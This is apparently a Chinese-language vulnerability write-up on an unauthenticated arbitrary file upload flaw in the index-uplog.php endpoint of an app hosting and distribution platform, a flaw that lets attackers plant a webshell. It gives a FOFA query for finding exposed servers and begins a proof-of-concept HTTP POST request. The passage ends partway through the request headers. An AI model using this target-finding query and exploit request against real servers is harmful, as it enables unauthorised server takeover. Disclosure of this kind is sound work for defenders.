0x01 产品简介

App托管服务分发平台是一个为开发者提供全面、高效、安全的应用程序托管、分发和推广服务的平台。开发者可以将自己开发的应用程序上传到平台上，平台会对上传的应用程序进行审核，确保应用的质量和安全性。平台会根据开发者的要求，将应用分发到不同的应用市场、社交网络、广告平台等渠道上，扩大应用的曝光范围。同时，平台还提供多种推广服务，如搜索引擎优化、社交媒体推广、广告投放等，帮助开发者提高应用的下载量和知名度。帮助开发者更高效、更安全地推广他们的应用程序，实现商业价值的最大化。

0x02 漏洞概述

App托管服务分发平台 index-uplog.php 接口处存在任意文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传webshell致服务器，执行任意代码，从而获取服务器权限。

0x03 复现环境

FOFA：body="/api/statistics/service-usage-amount"

0x04 漏洞复现

PoC

POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/